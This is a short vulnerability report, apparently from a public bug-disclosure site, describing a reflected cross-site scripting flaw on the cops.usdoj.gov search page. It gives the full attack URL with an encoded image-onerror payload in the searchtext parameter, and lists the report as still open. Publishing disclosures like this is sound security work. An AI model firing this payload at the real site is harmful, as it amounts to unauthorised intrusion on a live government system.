XSS in cops subdomain of US Department of Justice cops.usdoj.gov ,capable of User account takeover. 302

Domain: https://cops.usdoj.gov/RIC/ric.php?page=searchrez&cmd=1&pagenum=0&sort=title-LH&searchtext=fffffff%22--%3E%3Cimg%20src=X%20onerror=alert(%27XSS%27);document.write(%27FEBIN_PWNED%27);%3E

Tweet

Reported on cops.usdoj.gov

Total # of issues reported = 1

Reported by febinrev

Total Points of febinrev = 320

Browser Version: 68.0

Operating System: Linux

OS Version:

Bug Type: Security

Status: open

Added on: Aug. 28, 2020, 2:11 p.m.

Description

Screenshots:

OCR Results:

OCR not installed

Comments:

No comment added yet. Be the first to comment!